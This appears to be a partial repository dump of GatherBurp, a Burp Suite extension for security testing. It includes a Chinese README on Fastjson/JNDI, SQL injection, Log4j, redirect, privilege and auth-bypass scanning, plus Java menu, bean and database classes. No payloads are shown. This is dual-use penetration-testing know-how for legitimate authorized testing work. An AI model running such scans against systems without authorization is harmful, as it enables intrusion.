[
{
"path": ".gitignore",
"content": "target/\n!.mvn/wrapper/maven-wrapper.jar\n!**/src/main/**/target/\n!**/src/test/**/target/\n\n### IntelliJ IDEA ###\n.idea/modules.xml\n.idea/jarRepositories.xml\n.idea/compiler.xml\n.idea/libraries/\n*.iws\n*.iml\n*.ipr\n\n### Eclipse ###\n.apt_generated\n.classpath\n.factorypath\n.project\n.settings\n.springBeans\n.sts4-cache\n\n### NetBeans ###\n/nbproject/private/\n/nbbuild/\n/dist/\n/nbdist/\n/.nb-gradle/\nbuild/\n!**/src/main/**/build/\n!**/src/test/**/build/\n\n### VS Code ###\n.vscode/\n\n### Mac OS ###\n.DS_Store"
},
{
"path": ".idea/.gitignore",
"content": "# Default ignored files\n/shelf/\n/workspace.xml\n# Editor-based HTTP Client requests\n/httpRequests/\n# Datasource local storage ignored files\n/dataSources/\n/dataSources.local.xml\n# GitHub Copilot persisted chat sessions\n/copilot/chatSessions\n"
},
{
"path": ".idea/MarsCodeWorkspaceAppSettings.xml",
"content": "\n\n \n \n \n \n"
},
{
"path": ".idea/encodings.xml",
"content": "\n\n \n \n \n \n"
},
{
"path": ".idea/misc.xml",
"content": "\n\n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": ".idea/runConfigurations.xml",
"content": "\n\n \n \n \n"
},
{
"path": ".idea/uiDesigner.xml",
"content": "\n\n \n \n - \n \n
\n - \n \n
\n - \n \n
\n - \n \n
\n - \n \n \n \n \n
\n - \n \n \n \n \n
\n - \n \n \n \n \n
\n - \n \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n
\n - \n \n
\n - \n \n
\n - \n \n
\n - \n \n \n \n
\n - \n \n
\n - \n \n
\n \n \n \n \n \n \n"
},
{
"path": ".idea/vcs.xml",
"content": "\n\n \n \n \n"
},
{
"path": "README.md",
"content": "# GatherBurp\n\n\n\n\n\n[](LICENSE)\n[](https://github.com/kN6jq/gatherBurp/stargazers)\n[](https://github.com/kN6jq/gatherBurp/issues)\n[](https://github.com/kN6jq/gatherBurp/releases)\n\n**一款强大的 BurpSuite 安全测试扩展,集成多种漏洞检测与渗透测试功能**\n\n[功能特点](#-功能特点) •\n[快速开始](#-快速开始) •\n[详细文档](#-详细文档) •\n[贡献指南](#-贡献指南) •\n[交流讨论](#-交流讨论)\n\n
\n\n## 📋 功能特点\n\nGatherBurp 集成了多种安全测试功能,可大幅提升渗透测试和漏洞挖掘效率。\n\n### 🔍 漏洞检测\n\n- **Fastjson 漏洞扫描**\n - 支持 DNS 回连检测\n - 支持 JNDI 利用链检测\n - 支持回显检测(Tomcat、Spring 等环境)\n - 支持版本识别\n\n- **SQL 注入检测**\n - 支持 GET、POST 参数检测\n - 支持 Cookie 参数检测\n - 支持多层级 JSON 参数检测\n - 支持报错注入、时间盲注、布尔盲注\n - 支持自定义 payload 和检测规则\n\n- **Log4j 漏洞检测**\n - 支持 DNS 和 IP 回连检测\n - 支持参数和 Header 检测\n - 自定义 payload 列表\n\n- **URL 重定向漏洞检测**\n - 自动检测常见重定向参数\n - 支持自定义 payload 和参数列表\n - 结果可按 ID 数值排序\n\n### 🛡️ 权限测试\n\n- **越权访问检测**\n - 支持原始请求、低权限请求和无权限请求对比\n - 自动分析响应长度差异\n - 结果可按 ID 数值排序\n\n- **认证绕过测试**\n - URI 特殊字符绕过\n - Header 字段绕过\n - Accept 头绕过\n\n### 🌐 信息收集\n\n- **多层级路由扫描**\n - 支持复杂条件表达式过滤\n - 自定义字典和规则\n - 智能识别有效路径\n\n### 🔧 辅助工具\n\n- **Nuclei 模板生成**\n - 一键生成 Nuclei 扫描模板\n - 支持多种漏洞类型\n\n- **代理池功能**\n - 支持 SOCKS 代理\n - 多代理自动切换\n\n- **复杂数据提交**\n - 支持 Base64 编码数据自动解码\n - 解决序列化数据编码问题\n\n- **工具快速调用**\n - 支持自定义工具集成\n - 支持占位符:{url}、{host}、{request}\n\n## 🚀 快速开始\n\n### 安装要求\n\n- JDK 1.8+\n- BurpSuite Professional 2021.x+\n- Maven 3.6+ (仅编译时需要)\n\n### 编译安装\n\n```bash\n# 克隆仓库\ngit clone https://github.com/kN6jq/gatherBurp.git\n\n# 进入项目目录\ncd gatherBurp\n\n# 编译打包\nmvn clean package\n```\n\n编译后的 JAR 文件位于 `target/` 目录下。\n\n### 在 BurpSuite 中加载\n\n1. 打开 BurpSuite Professional\n2. 进入 `Extender` -> `Extensions` 标签\n3. 点击 `Add` 按钮\n4. 选择 `Java` 类型,并选择编译好的 JAR 文件\n5. 点击 `Next` 完成加载\n\n### 基本使用\n\n所有功能可通过以下方式访问:\n\n1. **右键菜单**:在 Proxy、Repeater 等模块中右键点击请求\n2. **扩展标签页**:在 BurpSuite 顶部标签栏中的 `GatherBurp` 标签\n\n## 📚 详细文档\n\n### Fastjson 扫描\n\n\n\n**使用步骤:**\n\n1. 在 `配置` 标签页设置 DNS 和 IP\n2. 右键选择 `FastJson` -> 选择检测类型:\n - DNS 检测:适用于外网环境\n - JNDI 检测:支持 DNS/IP 回连\n - 回显检测:适用于内网环境\n - 版本检测:识别 Fastjson 版本\n\n**高级配置:**\n\n- DNS 扫描:配置类型为 dns,使用 FUZZ 占位符\n- 回显检测支持多种环境:Tomcat、Spring 等\n\n### SQL 注入检测\n\n**功能特点:**\n\n- 支持多种注入类型检测\n- 支持参数、Cookie、Header、JSON 数据\n- 支持自定义 payload 和错误关键字\n- 支持白名单域名过滤\n- 结果可按 ID 数值排序\n\n**使用方法:**\n\n1. 右键选择 `SQL Inject` \n2. 在标签页中配置检测参数\n3. 查看检测结果和详细请求响应\n\n### Log4j 漏洞检测\n\n**功能特点:**\n\n- 支持 DNS 和 IP 回连检测\n- 支持参数和 Header 检测\n- 自定义 payload 列表\n- 结果可按 ID 数值排序\n\n**使用方法:**\n\n1. 右键选择 `Log4j Scan`\n2. 在标签页中配置检测参数\n3. 查看检测结果和详细请求响应\n\n### 权限检测\n\n\n\n**功能特点:**\n\n- 支持原始请求、低权限请求和无权限请求对比\n- 自动分析响应长度差异\n- 结果可按 ID 数值排序\n\n**使用方法:**\n\n1. 右键选择 `Perm Check`\n2. 在标签页中配置低权限和无权限认证信息\n3. 查看检测结果和详细请求响应对比\n\n### URL 重定向检测\n\n**功能特点:**\n\n- 自动检测常见重定向参数\n- 支持自定义 payload 和参数列表\n- 结果可按 ID 数值排序\n\n**使用方法:**\n\n1. 右键选择 `UrlRedirect`\n2. 在标签页中配置检测参数\n3. 查看检测结果和详细请求响应\n\n### 多层级路由扫描\n\n**表达式语法:**\n\n```\ncode=200\nbody=\"hello\"\ntitle=\"druid\"\nheaders=\"Content-Type: application/json\"\n\n# 复杂条件\ncode=200 && body=\"hello\"\ncode!=200 && (body=\"hello\" || title=\"druid\")\n```\n\n**使用方法:**\n\n1. 在 `Route` 标签页配置扫描参数\n2. 设置字典和过滤条件\n3. 开始扫描并查看结果\n\n### 工具快速调用\n\n**配置方法:**\n\n1. 在 `配置` 标签页添加工具名称和命令\n2. 支持以下占位符:\n - `{url}`: 当前请求的完整 URL\n - `{host}`: 当前请求的主机名\n - `{request}`: 当前请求的临时文件路径\n\n**使用方法:**\n\n右键菜单中选择配置好的工具名称即可快速调用\n\n## 🤝 贡献指南\n\n我们非常欢迎各种形式的贡献:\n\n- 🐛 **报告 Bug**:提交详细的 Bug 报告,包括复现步骤\n- 💡 **功能建议**:提出新功能或改进建议\n- 📝 **文档改进**:完善或更正文档内容\n- 🔧 **代码贡献**:提交 Pull Request 修复问题或添加功能\n\n**贡献流程:**\n\n1. Fork 本仓库\n2. 创建功能分支 (`git checkout -b feature/amazing-feature`)\n3. 提交更改 (`git commit -m 'Add some amazing feature'`)\n4. 推送到分支 (`git push origin feature/amazing-feature`)\n5. 提交 Pull Request\n\n## 👥 交流讨论\n\n加入微信讨论群:\n\n请移步 Issues 查看群聊二维码\n\n## 📋 未来计划\n\n- [ ] 更多漏洞检测模块\n- [ ] 性能优化和代码重构\n- [ ] 完善文档和使用示例\n- [ ] 支持更多自定义配置选项\n- [ ] 国际化支持\n\n## ⚠️ 免责声明\n\n本工具仅用于授权的安全测试和教育目的,请勿用于非法用途。使用本工具造成的任何后果由使用者自行承担。\n\n## 📄 许可证\n\n[MIT License](LICENSE)\n\n---\n\n\n\n如果觉得这个项目对您有帮助,请给个 Star ⭐️ 支持一下!\n\n
\n"
},
{
"path": "pom.xml",
"content": "\n 4.0.0\n\n org.xm17\n gatherBurp\n 1.2.0-SNAPSHOT\n jar\n\n gatherBurp\n http://maven.apache.org\n\n \n UTF-8\n \n \n \n jitpack.io\n https://jitpack.io\n \n \n\n \n \n com.github.bit4woo\n burp-api-common\n master-SNAPSHOT\n \n \n \n com.intellij\n forms_rt\n 7.0.3\n \n \n \n org.xerial\n sqlite-jdbc\n 3.43.2.2\n \n \n \n com.alibaba\n fastjson\n 1.2.83\n \n \n net.portswigger.burp.extender\n burp-extender-api\n 2.3\n \n \n org.springframework\n spring-expression\n 4.3.22.RELEASE\n \n \n\n \n \n \n maven-assembly-plugin\n \n \n \n burp.BurpExtender\n \n \n .\n \n \n \n jar-with-dependencies\n \n \n \n \n make-assembly\n package\n \n single\n \n \n \n \n \n org.apache.maven.plugins\n maven-compiler-plugin\n \n 8\n 8\n \n \n \n \n\n"
},
{
"path": "src/main/java/burp/BurpExtender.java",
"content": "package burp;\n\nimport burp.bean.ConfigBean;\nimport burp.menu.*;\nimport burp.ui.MainUI;\nimport burp.utils.RobotInput;\nimport burp.utils.Utils;\n\nimport javax.swing.*;\nimport java.awt.event.ActionEvent;\nimport java.io.PrintWriter;\nimport java.util.*;\n\nimport static burp.dao.ConfigDao.getToolConfig;\nimport static burp.utils.Utils.writeReqFile;\n\npublic class BurpExtender implements IBurpExtender, IContextMenuFactory, IHttpListener {\n @Override\n public void registerExtenderCallbacks(IBurpExtenderCallbacks iBurpExtenderCallbacks) {\n Utils.callbacks = iBurpExtenderCallbacks;\n Utils.helpers = iBurpExtenderCallbacks.getHelpers();\n Utils.stdout = new PrintWriter(iBurpExtenderCallbacks.getStdout(), true);\n Utils.stderr = new PrintWriter(iBurpExtenderCallbacks.getStderr(), true);\n Utils.callbacks.setExtensionName(Utils.NAME);\n Utils.callbacks.registerContextMenuFactory(this);\n Utils.callbacks.registerHttpListener(this);\n MainUI mainUI = new MainUI(Utils.callbacks);\n Utils.callbacks.addSuiteTab(mainUI);\n SwingUtilities.invokeLater(new Runnable() {\n @Override\n public void run() {\n Utils.callbacks.customizeUiComponent(mainUI);\n }\n });\n Utils.stdout.println(\"[\" + Utils.NAME + \" v\" + Utils.VERSION + \"] by \" + Utils.AUTHOR + \" loaded successfully.\\n\");\n Utils.stdout.println(\"Tip: If any errors occur, delete the '.gather' directory in your user folder and reload the extension.\\n\");\n Utils.stdout.println(\"GitHub: https://github.com/kN6jq/gatherBurp\\n\");\n\n }\n\n @Override\n public List createMenuItems(IContextMenuInvocation iContextMenuInvocation) {\n List listMenuItems = new ArrayList(1);\n IHttpRequestResponse[] requestResponses = iContextMenuInvocation.getSelectedMessages();\n IHttpRequestResponse baseRequestResponse = iContextMenuInvocation.getSelectedMessages()[0];\n // 如果是个空的, 则返回null\n if (baseRequestResponse.getHttpService() == null) {\n return null;\n }\n List toolParam = getToolConfig();\n for (ConfigBean config : toolParam) {\n String name = config.getType();\n String value = config.getValue();\n if (!name.isEmpty() && !value.isEmpty()) {\n JMenuItem jMenuItem = new JMenuItem(name);\n jMenuItem.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n if (value.contains(\"{url}\")){\n String url = Utils.helpers.analyzeRequest(baseRequestResponse).getUrl().toString();\n try {\n RobotInput ri = new RobotInput();\n ri.inputString(value.replace(\"{url}\", url));\n } catch (Exception ex) {\n Utils.stderr.println(ex.getMessage());\n }\n }else if (value.contains(\"{host}\")) {\n String host = baseRequestResponse.getHttpService().getHost();\n try {\n RobotInput ri = new RobotInput();\n ri.inputString(value.replace(\"{host}\", host));\n } catch (Exception ex) {\n Utils.stderr.println(ex.getMessage());\n }\n } else if (value.contains(\"{request}\")) {\n String requestFilePath = writeReqFile(baseRequestResponse);\n if (requestFilePath != null) {\n try {\n RobotInput ri = new RobotInput();\n ri.inputString(value.replace(\"{request}\", requestFilePath));\n } catch (Exception ex) {\n Utils.stderr.println(ex.getMessage());\n }\n } else {\n Utils.stderr.println(\"Failed to write request file.\");\n }\n }\n }\n });\n listMenuItems.add(jMenuItem);\n }\n }\n\n JMenu fastjson = new JMenu(\"FastJson\");\n fastjson.add(new FastjsonMenu().FastjsonDnslogMenu(requestResponses));\n fastjson.add(new FastjsonMenu().FastjsonEchoMenu(requestResponses));\n fastjson.add(new FastjsonMenu().FastjsonJNDIMenu(requestResponses));\n fastjson.add(new FastjsonMenu().FastjsonVersionMenu(requestResponses));\n listMenuItems.add(fastjson);\n\n listMenuItems.add(new SqlMenu(requestResponses));\n listMenuItems.add(new AuthMenu(requestResponses));\n listMenuItems.add(new RouteMenu(requestResponses));\n listMenuItems.add(new Log4jMenu(requestResponses));\n listMenuItems.add(new PermMenu(requestResponses));\n listMenuItems.add(new NucleiMenu(requestResponses));\n listMenuItems.add(new TextProcessMenu(iContextMenuInvocation));\n return listMenuItems;\n }\n\n @Override\n public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) {\n if (toolFlag == IBurpExtenderCallbacks.TOOL_REPEATER && messageIsRequest) {\n byte[] request = messageInfo.getRequest();\n String requestStr = Utils.helpers.bytesToString(request);\n if (requestStr.contains(\"\")) {\n // 解码 base64 数据\n String data = requestStr.substring(requestStr.indexOf(\"\") + 9, requestStr.indexOf(\"\"));\n byte[] decodedData = Base64.getDecoder().decode(data);\n\n // 构建新的请求体\n byte[] newBytes = new byte[requestStr.indexOf(\"\") + decodedData.length + (request.length - requestStr.indexOf(\"\") - 10)];\n System.arraycopy(request, 0, newBytes, 0, requestStr.indexOf(\"\"));\n System.arraycopy(decodedData, 0, newBytes, requestStr.indexOf(\"\"), decodedData.length);\n System.arraycopy(request, requestStr.indexOf(\"\") + 10, newBytes, requestStr.indexOf(\"\") + decodedData.length, request.length - requestStr.indexOf(\"\") - 10);\n\n // 更新 Content-Length\n IRequestInfo analyzedRequest = Utils.helpers.analyzeRequest(newBytes);\n List headers = new ArrayList<>(analyzedRequest.getHeaders());\n int bodyOffset = analyzedRequest.getBodyOffset();\n int contentLength = newBytes.length - bodyOffset;\n\n // 更新或添加 Content-Length 头\n boolean contentLengthFound = false;\n for (int i = 0; i < headers.size(); i++) {\n if (headers.get(i).startsWith(\"Content-Length:\")) {\n headers.set(i, \"Content-Length: \" + contentLength);\n contentLengthFound = true;\n break;\n }\n }\n if (!contentLengthFound) {\n headers.add(\"Content-Length: \" + contentLength);\n }\n\n // 重建请求\n byte[] body = new byte[newBytes.length - bodyOffset];\n System.arraycopy(newBytes, bodyOffset, body, 0, body.length);\n byte[] updatedRequest = Utils.helpers.buildHttpMessage(headers, body);\n\n messageInfo.setRequest(updatedRequest);\n }\n }\n }\n\n}\n"
},
{
"path": "src/main/java/burp/bean/AuthBean.java",
"content": "package burp.bean;\n\npublic class AuthBean {\n private String method;\n private String path;\n private String headers;\n\n public AuthBean() {\n }\n\n public AuthBean(String method, String path, String headers) {\n this.method = method;\n this.path = path;\n this.headers = headers;\n }\n\n public String getMethod() {\n return method;\n }\n\n public void setMethod(String method) {\n this.method = method;\n }\n\n public String getPath() {\n return path;\n }\n\n public void setPath(String path) {\n this.path = path;\n }\n\n public String getHeaders() {\n return headers;\n }\n\n public void setHeaders(String headers) {\n this.headers = headers;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/ConfigBean.java",
"content": "package burp.bean;\n\npublic class ConfigBean {\n private Integer id;\n private String module;\n private String type;\n private String value;\n\n public ConfigBean() {\n }\n\n public ConfigBean(String module, String type, String value) {\n this.module = module;\n this.type = type;\n this.value = value;\n }\n\n public Integer getId() {\n return id;\n }\n\n public void setId(Integer id) {\n this.id = id;\n }\n\n public String getModule() {\n return module;\n }\n\n public void setModule(String module) {\n this.module = module;\n }\n\n public String getType() {\n return type;\n }\n\n public void setType(String type) {\n this.type = type;\n }\n\n public String getValue() {\n return value;\n }\n\n public void setValue(String value) {\n this.value = value;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/FastjsonBean.java",
"content": "package burp.bean;\n\npublic class FastjsonBean {\n private Integer id;\n private String type;\n private String value;\n\n public FastjsonBean() {\n }\n\n public FastjsonBean(String type, String value) {\n this.type = type;\n this.value = value;\n }\n\n public Integer getId() {\n return id;\n }\n\n public void setId(Integer id) {\n this.id = id;\n }\n\n public String getType() {\n return type;\n }\n\n public void setType(String type) {\n this.type = type;\n }\n\n public String getValue() {\n return value;\n }\n\n public void setValue(String value) {\n this.value = value;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/Log4jBean.java",
"content": "package burp.bean;\n\npublic class Log4jBean {\n private Integer id;\n private String type;\n private String value;\n\n public Log4jBean() {\n }\n\n public Log4jBean(String type, String value) {\n this.type = type;\n this.value = value;\n }\n\n public Log4jBean(Integer id, String type, String value) {\n this.id = id;\n this.type = type;\n this.value = value;\n }\n\n public Integer getId() {\n return id;\n }\n\n public void setId(Integer id) {\n this.id = id;\n }\n\n public String getType() {\n return type;\n }\n\n public void setType(String type) {\n this.type = type;\n }\n\n public String getValue() {\n return value;\n }\n\n public void setValue(String value) {\n this.value = value;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/NucleiBean.java",
"content": "package burp.bean;\n\npublic class NucleiBean {\n private String id;\n private String name;\n private String author;\n private String severity;\n private String description;\n private String reference;\n private String tags;\n private String method;\n private String path;\n private String header;\n private String dsl;\n private String raw;\n\n public NucleiBean() {\n }\n\n public String getId() {\n return id;\n }\n\n public void setId(String id) {\n this.id = id;\n }\n\n public String getName() {\n return name;\n }\n\n public void setName(String name) {\n this.name = name;\n }\n\n public String getAuthor() {\n return author;\n }\n\n public void setAuthor(String author) {\n this.author = author;\n }\n\n public String getSeverity() {\n return severity;\n }\n\n public void setSeverity(String severity) {\n this.severity = severity;\n }\n\n public String getDescription() {\n return description;\n }\n\n public void setDescription(String description) {\n this.description = description;\n }\n\n public String getReference() {\n return reference;\n }\n\n public void setReference(String reference) {\n this.reference = reference;\n }\n\n public String getTags() {\n return tags;\n }\n\n public void setTags(String tags) {\n this.tags = tags;\n }\n\n public String getMethod() {\n return method;\n }\n\n public void setMethod(String method) {\n this.method = method;\n }\n\n public String getPath() {\n return path;\n }\n\n public void setPath(String path) {\n this.path = path;\n }\n\n public String getHeader() {\n return header;\n }\n\n public void setHeader(String header) {\n this.header = header;\n }\n\n public String getDsl() {\n return dsl;\n }\n\n public void setDsl(String dsl) {\n this.dsl = dsl;\n }\n\n public String getRaw() {\n return raw;\n }\n\n public void setRaw(String raw) {\n this.raw = raw;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/PermBean.java",
"content": "package burp.bean;\n\n/**\n * @Author Xm17\n * @Date 2024-06-22 10:47\n */\npublic class PermBean {\n private int id;\n private String type;\n private String value;\n\n public PermBean() {\n }\n\n public PermBean(String type, String value) {\n this.type = type;\n this.value = value;\n }\n\n public int getId() {\n return id;\n }\n\n public void setId(int id) {\n this.id = id;\n }\n\n public String getType() {\n return type;\n }\n\n public void setType(String type) {\n this.type = type;\n }\n\n public String getValue() {\n return value;\n }\n\n public void setValue(String value) {\n this.value = value;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/RouteBean.java",
"content": "package burp.bean;\n\npublic class RouteBean {\n private int id;\n private int enable;\n private String name;\n private String path;\n private String express;\n\n public RouteBean() {\n }\n\n public RouteBean(int id, int enable, String name, String path, String express) {\n this.id = id;\n this.enable = enable;\n this.name = name;\n this.path = path;\n this.express = express;\n }\n\n public int getId() {\n return id;\n }\n\n public void setId(int id) {\n this.id = id;\n }\n\n public int getEnable() {\n return enable;\n }\n\n public void setEnable(int enable) {\n this.enable = enable;\n }\n\n public String getName() {\n return name;\n }\n\n public void setName(String name) {\n this.name = name;\n }\n\n public String getPath() {\n return path;\n }\n\n public void setPath(String path) {\n this.path = path;\n }\n\n public String getExpress() {\n return express;\n }\n\n public void setExpress(String express) {\n this.express = express;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/SimilarDomainConfigBean.java",
"content": "package burp.bean;\n\npublic class SimilarDomainConfigBean {\n private int id;\n private int projectId;\n private String domain;\n private String createTime;\n\n public SimilarDomainConfigBean() {\n }\n\n public SimilarDomainConfigBean(int projectId, String domain) {\n this.projectId = projectId;\n this.domain = domain;\n }\n\n public int getId() {\n return id;\n }\n\n public void setId(int id) {\n this.id = id;\n }\n\n public int getProjectId() {\n return projectId;\n }\n\n public void setProjectId(int projectId) {\n this.projectId = projectId;\n }\n\n public String getDomain() {\n return domain;\n }\n\n public void setDomain(String domain) {\n this.domain = domain;\n }\n\n public String getCreateTime() {\n return createTime;\n }\n\n public void setCreateTime(String createTime) {\n this.createTime = createTime;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/SimilarDomainResultBean.java",
"content": "package burp.bean;\n\npublic class SimilarDomainResultBean {\n private int id;\n private int projectId;\n private String domain;\n private String ip;\n private String createTime;\n\n public SimilarDomainResultBean() {\n }\n\n public SimilarDomainResultBean(int projectId, String domain, String ip) {\n this.projectId = projectId;\n this.domain = domain;\n this.ip = ip;\n }\n\n public int getId() {\n return id;\n }\n\n public void setId(int id) {\n this.id = id;\n }\n\n public int getProjectId() {\n return projectId;\n }\n\n public void setProjectId(int projectId) {\n this.projectId = projectId;\n }\n\n public String getDomain() {\n return domain;\n }\n\n public void setDomain(String domain) {\n this.domain = domain;\n }\n\n public String getIp() {\n return ip;\n }\n\n public void setIp(String ip) {\n this.ip = ip;\n }\n\n public String getCreateTime() {\n return createTime;\n }\n\n public void setCreateTime(String createTime) {\n this.createTime = createTime;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/SimilarProjectBean.java",
"content": "package burp.bean;\n\npublic class SimilarProjectBean {\n private int id;\n private String name;\n private String createTime;\n\n public SimilarProjectBean() {\n }\n\n public SimilarProjectBean(String name) {\n this.name = name;\n }\n\n public int getId() {\n return id;\n }\n\n public void setId(int id) {\n this.id = id;\n }\n\n public String getName() {\n return name;\n }\n\n public void setName(String name) {\n this.name = name;\n }\n\n public String getCreateTime() {\n return createTime;\n }\n\n public void setCreateTime(String createTime) {\n this.createTime = createTime;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/SimilarUrlResultBean.java",
"content": "package burp.bean;\n\npublic class SimilarUrlResultBean {\n private int id;\n private int projectId;\n private String url;\n private String createTime;\n\n public SimilarUrlResultBean() {\n }\n\n public SimilarUrlResultBean(int projectId, String url) {\n this.projectId = projectId;\n this.url = url;\n }\n\n public int getId() {\n return id;\n }\n\n public void setId(int id) {\n this.id = id;\n }\n\n public int getProjectId() {\n return projectId;\n }\n\n public void setProjectId(int projectId) {\n this.projectId = projectId;\n }\n\n public String getUrl() {\n return url;\n }\n\n public void setUrl(String url) {\n this.url = url;\n }\n\n public String getCreateTime() {\n return createTime;\n }\n\n public void setCreateTime(String createTime) {\n this.createTime = createTime;\n }\n}\n"
},
{
"path": "src/main/java/burp/bean/SqlBean.java",
"content": "package burp.bean;\n\npublic class SqlBean {\n private int id;\n private String type;\n private String value;\n\n public SqlBean() {\n }\n\n public SqlBean(String type, String value) {\n this.type = type;\n this.value = value;\n }\n\n public int getId() {\n return id;\n }\n\n public void setId(int id) {\n this.id = id;\n }\n\n public String getType() {\n return type;\n }\n\n public void setType(String type) {\n this.type = type;\n }\n\n public String getValue() {\n return value;\n }\n\n public void setValue(String value) {\n this.value = value;\n }\n}\n"
},
{
"path": "src/main/java/burp/dao/ConfigDao.java",
"content": "package burp.dao;\n\nimport burp.bean.ConfigBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\n\npublic class ConfigDao {\n // 根据模块和类型获取配置\n public static ConfigBean getConfig(String module, String type) {\n ConfigBean config = new ConfigBean();\n String sql = \"select value from config where module = ? and type = ? order by id desc limit 1\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet resultSet = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, module);\n ps.setString(2, type);\n resultSet = ps.executeQuery();\n while (resultSet.next()) {\n config.setValue(resultSet.getString(\"value\"));\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, resultSet);\n }\n return config;\n }\n\n // 删除配置\n public static void deleteConfig(String type) {\n String sql = \"delete from config where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, type);\n ps.executeUpdate();\n } catch (Exception e) {\n e.printStackTrace();\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n\n // 根据id删除工具配置\n public static void deleteToolConfig(String type) {\n String sql = \"delete from config where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, type);\n ps.executeUpdate();\n } catch (Exception e) {\n e.printStackTrace();\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n\n // 根据类型更新配置\n public static void updateConfig(ConfigBean config) {\n String sql = \"update config set value = ? where type = ? and module = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, config.getValue());\n ps.setString(2, config.getType());\n ps.setString(3, config.getModule());\n ps.executeUpdate();\n } catch (Exception e) {\n e.printStackTrace();\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n\n // 保存配置\n public static void saveConfig(ConfigBean config) {\n String sql = \"INSERT OR REPLACE INTO config (module, type, value) VALUES (?, ?, ?)\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, config.getModule());\n ps.setString(2, config.getType());\n ps.setString(3, config.getValue());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n\n }\n\n // 获取工具配置\n public static List getToolConfig() {\n List configs = new ArrayList<>();\n String sql = \"select * from config where module = 'tool'\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet resultSet = null;\n try {\n ps = connection.prepareStatement(sql);\n resultSet = ps.executeQuery();\n while (resultSet.next()) {\n ConfigBean config = new ConfigBean();\n config.setId(resultSet.getInt(\"id\"));\n config.setModule(resultSet.getString(\"module\"));\n config.setType(resultSet.getString(\"type\"));\n config.setValue(resultSet.getString(\"value\"));\n configs.add(config);\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, resultSet);\n }\n return configs;\n }\n\n}\n"
},
{
"path": "src/main/java/burp/dao/FastjsonDao.java",
"content": "package burp.dao;\n\nimport burp.bean.FastjsonBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class FastjsonDao {\n public static List getFastjsonListsByType(String type) {\n List fastjsons = new ArrayList<>();\n\n String sql = \"select * from fastjson where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet resultSet = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, type);\n resultSet = ps.executeQuery();\n while (resultSet.next()) {\n FastjsonBean fastjson = new FastjsonBean();\n fastjson.setId(resultSet.getInt(\"id\"));\n fastjson.setType(resultSet.getString(\"type\"));\n fastjson.setValue(resultSet.getString(\"url\"));\n fastjsons.add(fastjson);\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, resultSet);\n }\n return fastjsons;\n\n }\n\n}\n"
},
{
"path": "src/main/java/burp/dao/Log4jDao.java",
